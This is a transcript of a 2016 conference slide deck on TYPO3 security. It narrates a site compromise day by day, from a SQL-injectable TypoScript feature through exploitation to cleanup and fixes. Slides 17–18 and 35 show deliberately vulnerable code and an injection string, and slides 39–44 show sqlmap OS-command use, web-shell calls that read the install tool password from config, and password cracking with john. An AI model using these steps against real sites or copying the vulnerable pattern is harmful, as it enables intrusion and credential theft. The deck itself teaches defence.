Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Diary of a Hack

Diary of a Hack

Telling the story how Websites are hacked. Starting from day one with creating and deploying a feature with a vulnerability and ending with cleaning up the website after it was taken over by attackers.

6c980f722cf236da20f1bb9e9efeb731?s=128

Helmut Hummel

April 22, 2016
Tweet

Transcript

  1. Inspiring people to share Diary of a Hack Vulnerabilities and

    Attacks Diary of a Hack Helmut Hummel <info@helhum.io> 22.04.2016 Vulnerabilities and Exploits 1
  2. 2 @helhum

  3. Security 3

  4. 4 http://typotic.com/uploads/posts/3427/funny-dude-this-is-boring-01.jpg

  5. 5 http://www.pxleyes.com/images/contests/teddy-bears-2/fullsize/Story-time-507bf54d589a1_hires.jpg

  6. 6 http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif

  7. 7 http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif

  8. 8 http://i.telegraph.co.uk/multimedia/archive/02210/squirrel_2210134b.jpg

  9. 9 https://xkcd.com/327/

  10. 10 http://www.kitploit.com/2013/06/john-ripper-v180-fast-password-cracker.html

  11. 11 https://ilifejourney.files.wordpress.com/2011/11/spaghetti-mess.jpg

  12. 12 http://img3.wikia.nocookie.net/__cb20121122132016/villains/images/f/fb/Janitor_2.jpg

  13. 13 http://i.livescience.com/images/i/000/029/390/i02/shutterstock_105432542.jpg?1343404330

  14. 14

  15. Diary of a Hack 15

  16. Diary of a Hack Day 1 - Implementing a feature

    16
  17. Diary of a Hack 17 lib.sqliSimple = CONTENT
 lib.sqliSimple {


    table = tt_content
 select.where.wrap = colPos=|
 select.where.data = GP:colPos
 }
  18. Diary of a Hack 18 lib.sqliSearch = CONTENT
 lib.sqliSearch {


    table = tt_content
 select.where.wrap = header like '%|%'
 select.where.data = GP:search
 }
  19. Diary of a Hack Day 2 - Testing the feature

    19
  20. Diary of a Hack 20

  21. Diary of a Hack 21 'BE/debug' => '1' 'FE/debug' =>

    '1' 'SYS/devIPmask' => '*' 'SYS/displayErrors' => '1' 'SYS/sqlDebug' => '1' 'SYS/exceptionalErrors' => '28674'
  22. Diary of a Hack 22

  23. Diary of a Hack 23 'DB/username' => 'root'

  24. Diary of a Hack 24

  25. Diary of a Hack Day 3 - Distraction 25

  26. Diary of a Hack 26

  27. Diary of a Hack Day 4 - Attraction 27

  28. Diary of a Hack 28 https://www.google.de/?q=exec_SELECTquery+%22You +have+an+error+in+your+SQL+syntax%22

  29. Diary of a Hack Day 5 - Exploitation 29

  30. Inspiring people to share Diary of a Hack Vulnerabilities and

    Attacks Excursion - SQLi 30
  31. Excursion - SQLi 31 SELECT * FROM tt_content WHERE colPos

    = 0
  32. 32 'SELECT * FROM tt_content WHERE colPos = ' .

    $_GET['colPos'] Excursion - SQLi
  33. 33 Excursion - SQLi

  34. 34 'SELECT * FROM tt_content WHERE colPos = ' .

    $_GET['colPos'] Excursion - SQLi
  35. 35 'SELECT * FROM tt_content WHERE colPos = 0 or

    hidden = 1' $_GET['colPos'] Excursion - SQLi
  36. Disclaimer 36

  37. Don’t do this at home! 37

  38. (unless you have written permit) 38

  39. Diary of a Hack 39 $ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p

    'colPos' ! GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
  40. Inspiring people to share Diary of a Hack Vulnerabilities and

    Attacks The power of MySQL 40
  41. Diary of a Hack 41 $ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p

    'colPos' \ —os-cmd='ls -al'
  42. Diary of a Hack 42

  43. Diary of a Hack 43 http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ ENABLE_INSTALL_TOOL ! http://security.dev/typo3/sysext/install/Start/Install.php !

    http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword %20typo3conf/LocalConfiguration.php
  44. Diary of a Hack 44 $ john pw Loaded 1

    password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5]) password (dummy) guesses: 1 time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015) c/s: 900 trying: 123456 - fishing
  45. Diary of a Hack 45

  46. Diary of a Hack Day 5 - Discovery 46

  47. Diary of a Hack Discovery • Take site offline! •

    seriously • I mean it 47
  48. 48

  49. Diary of a Hack Day 6 - Analysis 49

  50. Diary of a Hack Analysis • Make a backup of

    current state (files, DB, logs) • Search all logs for „suspicious“ entries • Find point of entry (security issue) • If in doubt: get help 50
  51. Diary of a Hack Day 7 - Fix 51

  52. Diary of a Hack 52 lib.sqliSimple = CONTENT
 lib.sqliSimple {


    table = tt_content
 select.where = colPos=###colPos###
 select.markers {
 colPos.data = GP:colPos
 }
 }
  53. Diary of a Hack 53 lib.sqliSearch = CONTENT
 lib.sqliSearch {


    table = tt_content
 select.where = header like ###search###
 select.markers {
 search.data = GP:search
 search.wrap = %|%
 }
 }
  54. Diary of a Hack Fix • Close security issue in

    Code/ Extension/ Core • Restore from backup • Or if you really know what you are doing: cleanup installation • Go online again • Plan improvements (education, monitoring, …) 54
  55. Diary of a Hack Day 8 - Improve 55

  56. Inspiring people to share Security of Web Applications Vulnerabilities and

    Attacks Topictext Lessons learned • Development/ Testing Environment • Deploy to Production • Least privilege • There is no Software without bugs. Be prepared! 56
  57. Diary of a Hack Best Practice • Operations • Regular

    updates • Backups • Monitoring • Development • Peer Reviews (TypoScript, Code, Templates) • (automated) Tests • Focus • Education • Allocate time for all of the above 57
  58. Questions? 58

  59. Inspiring people to share Security of Web Applications Vulnerabilities and

    Attacks Diary of a Hack Resources • http://docs.typo3.org/typo3cms/SecurityGuide/ • http://sqlmap.org • http://www.openwall.com/john/ • https://www.owasp.org/ 59
  60. Thank you! 60

  61. 61 @helhum http://helhum.io info@helhum.io